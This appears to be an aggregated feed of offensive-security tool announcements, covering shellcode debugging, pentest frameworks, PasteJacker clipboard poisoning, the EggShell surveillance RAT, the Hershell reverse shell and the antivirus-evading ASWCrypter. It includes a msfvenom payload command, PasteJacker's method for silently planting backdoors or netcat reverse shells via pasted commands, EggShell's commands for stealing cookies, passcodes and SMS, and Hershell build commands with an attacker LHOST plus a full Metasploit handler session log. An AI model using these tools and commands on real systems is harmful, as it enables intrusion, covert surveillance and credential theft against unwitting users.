BlobRunner – Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis.BlobRunner allocates memory for the target file and jumps to the base (or offset) of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort.To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below.BuildingBuilding the executable is straight forward and relatively painless.RequirementsDownload and install Microsoft Visual C++ Build Tools or Visual StudioBuild StepsOpen Visual Studio Command PromptNavigate to the directory where BlobRunner is checked outBuild the executable by running:cl blobrunner.cBuilding BlobRunner x64Building the x64 version is virtually the same as above, but simply uses the x64 tooling.Open x64 Visual Studio Command PromptNavigate to the directory where BlobRunner is checked outBuild the executable by running: cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.cUsageTo debug:Open BlobRunner in your favorite debugger.Pass the shellcode file as the first parameter.Add a breakpoint before the jump into the shellcodeStep into the shellcodeBlobRunner.exe shellcode.binDebug into file at a specific offset.BlobRunner.exe shellcode.bin –offset 0x0100Debug into file and don’t pause before the jump. Warning: Ensure you have a breakpoint set before the jump.BlobRunner.exe shellcode.bin –nopauseDebugging x64 ShellcodeInline assembly isn’t supported by the x64 compiler, so to support debugging into x64 shellcode the loader creates a suspended thread which allows you to place a breakpoint at the thread entry, before the thread is resumed.Remote Debugging Shell Blobs (IDAPro)The process is virtually identical to debugging shellcode locally – with the exception that the you need to copy the shellcode file to the remote system. If the file is copied to the same path you are running win32_remote.exe from, you just need to use the file name for the parameter. Otherwise, you will need to specify the path to the shellcode file on the remote system.Shellcode SamplesYou can quickly generate shellcode samples using the Metasploit tool msfvenom.Generating a simple Windows exec payload.msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -o test2.binFeedback / HelpAny questions, comments or requests you can find us on twitter: @seanmw or @herrcorePull requests welcome!Download BlobRunner

Link: http://feedproxy.google.com/~r/PentestTools/~3/0kcKLQrdZYA/blobrunner-quickly-debug-shellcode.html

DarkSpiritz v2.0 – A Penetration Testing Framework For Linux, MacOS, And Windows Systems

A penetration testing framework for Linux and Windows systems.What is DarkSpiritz?Created by the SynTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as “Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at syndicatedintel@protonmail.com.Syntel Team:M4cs | @maxbridglandRyan | @ryan0x1Version 2.0 UPDATE (READ IMPORTANT)This version should run a lot smoother and have a cleaner UI. Check the reddit post here to see all changes: https://www.reddit.com/r/netsec/comments/9skdju/huge_update_to_darkspiritz_pentesting_framework/Getting StartedClone the repository with git:git clone https://github.com/DarkSpiritz/DarkSpiritz.gitDarkSpiritz wiki available hereTo install DarkSpiritz clone the github repo and run:pip install -r requirements.txtThis will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:python start.pyor./start.py(if ./start.py doesn’t work run chmod +x start.py from within the same directory as DarkSpiritz.)You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.Features:These are features that DarkSpiritz Team prides themself on based on this program:Real Time Updating of ConfigurationNever a need to restart the program even when adding plugins or editing them.Easy to use UXMulti-functionalityDownload DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/_qFlgmuW1Is/darkspiritz-v20-penetration-testing.html

PasteJacker – Add PasteJacking To Web-Delivery Attacks

The main purpose of the tool is automating (PasteJacking/Clipboard poisoning/whatever you name it) attack with collecting all the known tricks used in this attack in one place and one automated job as after searching I found there’s no tool doing this job the right way.Now while this attack depends on what the user will paste, imagine adding this attack to Metasploit web delivery module.See this simple scenario to make things clear:The target opens an HTML page served by the tool and this page has anything that makes the wants to copy from it to the terminal like some installation instructions.Target copies a thing from the page then it replaced quickly with our line.The user pastes it in the terminal and before he notices that the line changed, the line gets executed by itself in the background and the terminal gets cleared.All of that happened in a second and the user sees the terminal is usable again and maybe thinks this is a bad program and he won’t install it but you already got your meterpreter shell.This tool uses 3 methods to trick user into copying our payload instead of the command he copies: Using javascript to hook the copy event and replace copied data. Advantages :Anything the user copies in the page will be replaced with our line.Command executed by itself once target paste it without pressing enter.Disadvantages :Requires Javascript to be enabled on the target browser. Using span style attribute to hide our lines by overwriting. Advantages :Doesn’t require javascript to be enabled.Works on all browsers.Disadvantages :Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines. Using span style again but this time to make our text transparent and non-markable. Advantages :Doesn’t require javascript to be enabled.Disadvantages :Target must select all the text in the page to ensure that he copies our hidden malicious lines.Not working on opera and chrome.What’s the payload user copies ?PasteJacker gives you the option to do one of this things:Generate a msfvenom backdoor on our machine and the liner target gonna copy will download the backdoor on the its machine, through wget or certutil depends on the OS, then executes it on the background without printing anything to the terminal.Serve a liner that gets you a reverse netcat connection on the target machine running in the background of course.Serve your custom liner like Metasploit web-delivery payload with adding some touches to hide any possible output.ScreenshotsInstalling and requirementsPython 3 and setuptools module.Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).Third-party requirements like msfvenom but only if you are gonna use the msfvenom option of course.Third-party library ncurses-dev for Ubuntu (Thanks for @mhaskar).Root access.InstallingFor Linux :git clone https://github.com/D4Vinci/PasteJacker.gitsudo python3 -m pip install ./PasteJackersudo pastejackerUpdating the framework or the databaseOn Linux while outside the directorycd PasteJacker && git pull && cd ..sudo python3 -m pip install ./PasteJacker –upgradeReferencesPasteJacking GitHub repoClipboard poisoning attacks on the Mac – MalwarebytesMetasploit web delivery module ContactTwitterDisclaimerPasteJacker is created to help in penetration testing and it’s not responsible for any misuse or illegal purposes.Copying a code from this tool or using it in another tool is accepted as you mention where you get it from.Pull requests are always welcomed :DDownload PasteJacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/oO5iiRHaY_4/pastejacker-add-pastejacking-to-web.html

UPDATED VERSION: RouterSploit 3.4.0

PenTestIT RSS Feed
RouterSploit 3.4.0, the long awaited router exploitation framework update is out guys! This release includes some really cool features and updates such as using pycryptodome from pycryptoand newer exploitation modules! Read on for the improvements. What is RouterSploit? The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the followingRead more about UPDATED VERSION: RouterSploit 3.4.0
The post UPDATED VERSION: RouterSploit 3.4.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-4-0/

DarkSpiritz – A Penetration Testing Framework For UNIX Systems

What is DarkSpiritz?Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as “Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at sectel.team@protonmail.com.Getting StartedClone the repository with git:git clone https://github.com/DarkSpiritz/DarkSpiritz.gitDarkSpiritz wiki available hereTo install DarkSpiritz clone the github repo and run:sudo python installer.pyThis will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:python main.pyfrom within the same directory as DarkSpiritz.You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.Features:These are features that DarkSpiritz Team prides themself on based on this program:Real Time Updating of ConfigurationNever a need to restart the program even when adding plugins or editing them.Easy to use UXMulti-functionalityScreenshots:Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/b4RKOuo6W4s/darkspiritz-penetration-testing.html

NodeXP – Detection and Exploitation Tool for Node.js Services

NodeXP is an intergrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on S(erver)S(ide)J(avascript)I(njection) attack!Getting Started – Installation & UsageDownload NodeXP by cloning the Git repository:git clone https://github.com/esmog/nodexpTo get a list of all options run:python2.7 nodexp -hExamples for POST and GET cases accordingly:python2.7 nodexp.py –url=”http://nodegoat.herokuapp.com/contributions" –pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"python2.7 nodexp.py –url="http://nodegoat.herokuapp.com/contributions" –pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" –tech=blindpython2.7 nodexp.py –url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"python2.7 nodexp.py –url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" –tech=blindDisclaimerThe tool’s purpose is strictly academic and was developed in order to conduct my master’s thesis. It could also be helpful during the process of a penetration test on Node.js services. Any other malicious or illegal usage of the tool is strongly not recommended and is clearly not a part of the purpose of this research.PrerequisitesPython 2.7Metasploit FrameworkmsfvenomKali Linux (or any other Linux distro with Metasploit Framework installed)NodeXP TestbedsDownload and run the Node.js files for both GET and POST cases from hereVisit Nodegoat or install Nodegoat to your local machine!Built WithPython 2.7VersioningNodeXP – Version 1.0.0AuthorsDimitris Antonaropoulos – esmogDownload NodeXP

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIgb6RZFu0o/nodexp-detection-and-exploitation-tool.html

EggShell – iOS/macOS/Linux Remote Administration Tool

EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.For detailed information and how-to visit http://lucasjackson.io/eggshellFollow on twitter: @neoneggplantNew In Version 3.0.0More secure socket connection using SSLLinux supportTab completionImproved over all structure and efficiency of session handlingNative iOS python support for 64 bit devicesGetting StartedRequires python 2.7macOS/Linux Installationgit clone https://github.com/neoneggplant/eggshellcd eggshellpython eggshell.pyiOS (Jailbroken)Add Cydia source: http://lucasjackson.io/repo Install EggShell 3 Use any mobile terminal application and run the command eggshellCreating PayloadsEggshell payloads are executed on the target machine. The payload first sends over instructions for getting and sending back device details to our server and then chooses the appropriate executable to establish a secure remote control session.bashSelecting bash from the payload menu will give us a 1 liner that establishes an eggshell session upon execution on the target machineteensy macOS (USB injection)Teensy is a USB development board that can be programmed with the Arduino ide. It emulates usb keyboard strokes extremely fast and can inject the EggShell payload just in a few seconds.Selecting teensy will give us an arduino based payload for the teensy board.After uploading to the teensy, we can use the device to plug into a macOS usb port. Once connected to a computer, it will automatically emulate the keystrokes needed to execute a payload.Interacting with a sessionAfter a session is established, we can execute commands on that device through the EggShell command line interface. We can show all the available commands by typing “help"Tab CompletionSimilar to most command line interfaces, EggShell supports tab completion. When you start typing the path to a directory or filename, we can complete the rest of the path using the tab key.MultihandlerThe Multihandler option lets us handle multiple sessions. We can choose to interact with different devices while listening for new connections in the background.Similar to the session interface, we can type "help" to show Multihandler commandsCommandsmacOSbrightness : adjust screen brightnesscd : change directorydownload : download filegetfacebook : retrieve facebook session cookiesgetpaste : get pasteboard contentsgetvol : get speaker output volumeidletime : get the amount of time since the keyboard/cursor were touchedimessage : send message through the messages appitunes : iTunes Controllerkeyboard : your keyboard -> is target’s keyboardlazagne : firefox password retrieval | (https://github.com/AlessandroZ/LaZagne/wiki)ls : list contents of a directorymic : record micpersistence : attempts to re establish connection after closepicture : take picture through iSightpid : get process idprompt : prompt user to type passwordscreenshot : take screenshotsetvol : set output volumesleep : put device into sleep modesu : su loginsuspend : suspend current session (goes back to login screen)upload : upload fileiOSalert : make alert show up on devicebattery : get battery levelbundleids : list bundle identifierscd : change directorydhome : simulate a double home button pressdial : dial a phone numberdownload : download filegetcontacts : download addressbookgetnotes : download notesgetpasscode : retreive the device passcodegetsms : download SMSgetvol : get volume levelhome : simulate a home button pressinstallpro : install substrate commandsipod : control music playerislocked : check if the device is lockedlastapp : get last opened applicationlocate : get device location coordinateslocationservice: toggle location serviceslock : simulate a lock button pressls : list contents of a directorymic : record micmute : update and view mute statusopen : open appsopenurl : open url on devicepersistence : attempts to re establish connection after closepicture : take picture through iSightpid : get process idrespring : restart springboardsafemode : put device into safe modesay : text to speachsetvol : set device volumesysinfo : view system informationupload : upload filevibrate : vibrate deviceLinuxcd : change directorydownload : download filels : list contents of a directorypid : get process idpwd : show current directoryupload : upload fileDownload EggShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/n6erBSdtEEQ/eggshell-iosmacoslinux-remote.html

Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.Supported OS are:WindowsLinuxMac OSFreeBSD and derivativesWhy ?Although meterpreter payloads are great, they are sometimes spotted by AV products.The goal of this project is to get a simple reverse shell, which can work on multiple systems,How ?Since it’s written in Go, you can cross compile the source for the desired architecture.Building the payloadTo simplify things, you can use the provided Makefile. You can set the following environment variables:GOOS : the target OSGOARCH : the target architectureLHOST : the attacker IP or domain nameLPORT : the listener portFor the GOOS and GOARCH variables, you can get the allowed values here.However, some helper targets are available in the Makefile:depends : generate the server certificate (required for the reverse shell)windows32 : builds a windows 32 bits executable (PE 32 bits)windows64 : builds a windows 64 bits executable (PE 64 bits)linux32 : builds a linux 32 bits executable (ELF 32 bits)linux64 : builds a linux 64 bits executable (ELF 64 bits)macos : builds a mac os 64 bits executable (Mach-O)For those targets, you just need to set the LHOST and LPORT environment variables.Using the shellOnce executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.The following special commands are supported:run_shell : drops you an system shell (allowing you, for example, to change directories)inject : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)exit : exit gracefullyExamplesFirst of all, you will need to generate a valid certificate:$ make dependsopenssl req -subj ‘/CN=sysdream.com/O=Sysdream/C=FR’ -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pemGenerating a 4096 bit RSA private key…………………………………………………………………………++…..++writing new private key to ‘server.key’—–cat server.key >> server.pemFor windows:# Custom target$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234# Predifined target$ make windows32 LHOST=192.168.0.12 LPORT=1234For Linux:# Custom target$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234# Predifined target$ make linux32 LHOST=192.168.0.12 LPORT=1234For Mac OS X$ make macos LHOST=192.168.0.12 LPORT=1234ListenersOn the server side, you can use the openssl integrated TLS server:$ openssl s_server -cert server.pem -key server.key -accept 1234Using default temp DH parametersACCEPTbad gethostbyaddr—–BEGIN SSL SESSION PARAMETERS—–MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kEMHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=—–END SSL SESSION PARAMETERS—–Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHASignature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1Supported Elliptic Curve Point Formats: uncompressedSupported Elliptic Curves: P-256:P-384:P-521Shared Elliptic curves: P-256:P-384:P-521CIPHER is ECDHE-RSA-AES128-GCM-SHA256Secure Renegotiation IS supportedMicrosoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\LAB2\Downloads>Or even better, use socat with its readline module, which gives you a handy history feature:$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pemMicrosoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\LAB2\Downloads>Or, and this is great, use a metasploit handler:[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_sslpayload => python/shell_reverse_tcp_ssl[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1lhost => 192.168.122.1[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444lport => 4444[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pemhandlersslcert => /tmp/data/server.pem[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession falseexitonsession => false[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j[*] Exploit running as background job.[-] Handler failed to bind to 192.168.122.1:4444[*] Started reverse SSL handler on 0.0.0.0:4444[*] Starting the payload handler…[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2017-02-09 12:07:51 +0000[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1[*] Starting interaction with 1…Microsoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\lab1\Downloads>whoamiwhoamidesktop-jcfs2ok\lab1C:\Users\lab1\Downloads>CreditsRonan Kervella <r.kervella -at- sysdream -dot- com>Download Hershell

Link: http://feedproxy.google.com/~r/PentestTools/~3/ztyzWsKmaJ8/hershell-simple-tcp-reverse-shell.html

Remote NTLM relaying through meterpreter on Windows port 445

The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced again in part due to Dirk-jan (@_dirkjan) that saw this question flying … Continue reading “Remote NTLM relaying through meterpreter on Windows port 445"

Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html